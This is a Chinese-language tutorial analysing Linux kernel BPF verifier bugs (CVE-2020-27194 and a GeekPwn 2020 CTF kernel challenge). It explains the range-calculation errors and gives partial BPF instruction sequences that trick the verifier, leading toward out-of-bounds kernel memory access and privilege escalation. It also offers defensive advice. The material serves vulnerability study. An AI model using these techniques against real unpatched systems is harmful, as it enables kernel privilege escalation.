Linux Kernel BPF模块漏洞分析与利用教学<\/h1>

1. BPF基础概述<\/h2>
BPF (Berkeley Packet Filter) 是Linux内核中的一个重要模块，它允许用户态程序在内核中执行受限的字节码。主要特点包括：<\/p>
实现了BPF字节码的JIT (Just-In-Time)编译器<\/li>
用户可以在用户态编写BPF代码，经JIT编译后在内核执行<\/li>
通过验证器(verifier)机制进行静态分析，防止不安全行为<\/li> <\/ul>
关键安全机制：<\/p>
对常数变量设置取值范围限制<\/li>
结构体
bpf_reg_state<\/code>存储8个取值范围变量：
s64 smin_value;  \/\/ 最小可能(s64)值
<\/span><\/span><\/span><\/span>s64 smax_value;  \/\/ 最大可能(s64)值
<\/span><\/span><\/span><\/span>u64 umin_value;  \/\/ 最小可能(u64)值
<\/span><\/span><\/span><\/span>u64 umax_value;  \/\/ 最大可能(u64)值
<\/span><\/span><\/span><\/span>s32 s32_min_value;  \/\/ 最小可能(s32)值
<\/span><\/span><\/span><\/span>s32 s32_max_value;  \/\/ 最大可能(s32)值
<\/span><\/span><\/span><\/span>u32 u32_min_value;  \/\/ 最小可能(u32)值
<\/span><\/span><\/span><\/span>u32 u32_max_value;  \/\/ 最大可能(u32)值
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
2. 漏洞类型分析<\/h2>
这类漏洞的共同特点是验证阶段取值范围计算错误<\/strong>，导致：<\/p>

验证阶段计算x的取值范围为0 <= x <= 0x1000<\/code><\/li>
实际运行时x的值可以是0x2000<\/code><\/li>
导致内存越界读写<\/li>
<\/ol>
典型漏洞案例：<\/p>

CVE-2020-8835 (Pwn2Own提权漏洞)<\/li>
CVE-2017-16995 (早期BPF相关漏洞)<\/li>
CVE-2020-27194 (Linux kernel 5.8.x通杀洞)<\/li>
GeekPwn 2020决赛kernel题<\/li>
<\/ul>
3. CVE-2020-27194详细分析<\/h2>
漏洞成因<\/h3>
在scalar32_min_max_or<\/code>函数中，32位OR运算的取值范围分析错误：<\/p>
static<\/span> void<\/span> scalar32_min_max_or<\/span>(struct<\/span> bpf_reg_state *<\/span>dst_reg,
<\/span><\/span>                struct<\/span> bpf_reg_state *<\/span>src_reg)
<\/span><\/span>{
<\/span><\/span>    \/\/ ...省略部分代码...
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    \/* ORing two positives gives a positive, so safe to
<\/span><\/span><\/span>     * cast result into s64.
<\/span><\/span><\/span>     *\/<\/span>
<\/span><\/span>    dst_reg-><\/span>s32_min_value =<\/span> dst_reg-><\/span>umin_value;  \/\/ 错误赋值
<\/span><\/span><\/span><\/span>    dst_reg-><\/span>s32_max_value =<\/span> dst_reg-><\/span>umax_value;  \/\/ 错误赋值
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>问题点<\/strong>：<\/p>

直接将64位无符号数的取值范围赋给32位有符号数<\/li>
导致"差1错误"：当x的64位无符号数范围是1 <= x <= 0x100000001<\/code>时

验证阶段认为x的32位有符号数范围是1 <= x <= 1<\/code> (x=1)<\/li>
实际x可以是2<\/li>
<\/ul>
<\/li>
<\/ul>
漏洞利用构造<\/h3>
BPF程序构造示例：<\/p>
struct<\/span> bpf_insn prog[] =<\/span> {
<\/span><\/span>    BPF_LD_MAP_FD(BPF_REG_9, mapfd),
<\/span><\/span>    BPF_MAP_GET(0<\/span>, BPF_REG_5),  \/\/ r5 = input()
<\/span><\/span><\/span><\/span>    BPF_LD_IMM64(BPF_REG_6, 0x600000002<\/span>), \/\/ r6=0x600000002
<\/span><\/span><\/span><\/span>    BPF_JMP_REG(BPF_JLT, BPF_REG_5, BPF_REG_6, 1<\/span>), \/\/ if r5 < r6; jmp 1
<\/span><\/span><\/span><\/span>    BPF_EXIT_INSN(),
<\/span><\/span>    BPF_JMP_IMM(BPF_JGT, BPF_REG_5, 0<\/span>, 1<\/span>),  \/\/ if r5 > 0; jmp 1
<\/span><\/span><\/span><\/span>    BPF_EXIT_INSN(),
<\/span><\/span>    \/\/ 此时验证器认为 1 <= r5 <= 0x600000001
<\/span><\/span><\/span><\/span>    BPF_ALU64_IMM(BPF_OR, BPF_REG_5, 0<\/span>),   \/\/ r5 |=0; 验证器认为 1 <= r5 <=1, r5=1 
<\/span><\/span><\/span><\/span>    BPF_MOV_REG(BPF_REG_6, BPF_REG_5),     \/\/ r6 = r5
<\/span><\/span><\/span><\/span>    BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1<\/span>),  \/\/ r6 >>1  验证器认为0，实际可让r5=2则r6=1
<\/span><\/span><\/span><\/span>    \/\/ ...后续利用代码...
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>利用技巧<\/h3>

通过OR操作制造取值范围判断错误<\/li>
利用右移操作进一步扩大取值范围差异<\/li>
最终实现任意长度溢出读写<\/li>
需要根据不同内核版本调整array_map_ops<\/code>和init_pid_ns<\/code>的偏移<\/li>
<\/ol>
4. GeekPwn 2020决赛kernel题分析<\/h2>
漏洞点<\/h3>
题目基于Linux kernel 5.8.6，关键修改：<\/p>

删除了scalar_min_max_add<\/code>函数的整数溢出检查<\/li>
修改了adjust_scalar_min_max_vals<\/code>函数，移除了64位无符号数umin_val > umax_val<\/code>的检查<\/li>
<\/ol>
漏洞利用<\/h3>
构造加法整数溢出：<\/p>
struct<\/span> bpf_insn prog[] =<\/span> {
<\/span><\/span>    BPF_LD_MAP_FD(BPF_REG_9, mapfd),
<\/span><\/span>    BPF_MAP_GET(0<\/span>, BPF_REG_5),  \/\/ r5 = input()
<\/span><\/span><\/span><\/span>    BPF_LD_IMM64(BPF_REG_6, -<\/span>1<\/span>), \/\/ r6=-1
<\/span><\/span><\/span><\/span>    BPF_JMP_REG(BPF_JLE, BPF_REG_5, BPF_REG_6, 1<\/span>), \/\/ if r5 <= -1; jmp 1
<\/span><\/span><\/span><\/span>    BPF_EXIT_INSN(),
<\/span><\/span>    BPF_JMP_IMM(BPF_JGE, BPF_REG_5, 0<\/span>, 1<\/span>),  \/\/ if r5 >= 0; jmp 1
<\/span><\/span><\/span><\/span>    BPF_EXIT_INSN(),
<\/span><\/span>    \/\/ 此时 0 <= r5 <= -1 (整数溢出)
<\/span><\/span><\/span><\/span>    BPF_ALU64_IMM(BPF_ADD, BPF_REG_5, 1<\/span>),   \/\/ r5 += 1, 验证器认为 1 <= r5 <=0
<\/span><\/span><\/span><\/span>    BPF_MOV64_REG(BPF_REG_6, BPF_REG_5),    \/\/ r6 = r5
<\/span><\/span><\/span><\/span>    BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1<\/span>),  \/\/ r6 >>1 验证器认为r6=0，实际可输入r5=2则r6=1
<\/span><\/span><\/span><\/span>    \/\/ ...后续利用代码...
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>实际挑战<\/h3>

内核编译时开启了结构体随机化<\/li>
内核结构体变量偏移与正常编译不同<\/li>
需要通过分析内核函数汇编手动计算各种偏移<\/li>
<\/ol>
5. 漏洞利用通用模式<\/h2>

取值范围欺骗<\/strong>：构造使验证器误判变量取值范围的代码<\/li>
数学运算放大<\/strong>：通过加减、位运算等放大取值范围差异<\/li>
内存操作突破<\/strong>：利用错误的取值范围进行越界内存访问<\/li>
权限提升<\/strong>：修改关键内核数据结构实现提权<\/li>
<\/ol>
6. 防御建议<\/h2>

加强验证器对数学运算的边界检查<\/li>
对取值范围转换添加更严格的验证<\/li>
启用内核结构体随机化(虽然会增加利用难度，但不解决根本问题)<\/li>
及时更新内核补丁<\/li>
<\/ol>
7. 学习资源<\/h2>

BPF验证器fuzzing方法<\/a><\/li>
CVE-2020-8835分析<\/a><\/li>
Linux内核官方文档：BPF验证器实现细节<\/li>
<\/ol>
8. 总结<\/h2>
BPF模块漏洞的核心在于验证器对变量取值范围的错误计算。通过精心构造的BPF程序，可以欺骗验证器，实现内核内存的越界访问。这类漏洞的利用需要深入理解：<\/p>

BPF验证器的工作原理<\/li>
取值范围的计算逻辑<\/li>
数学运算对取值范围的影响<\/li>
内核内存布局和关键数据结构<\/li>
<\/ol>
研究这些漏洞不仅能提高漏洞挖掘能力，也能加深对Linux内核安全机制的理解。<\/p>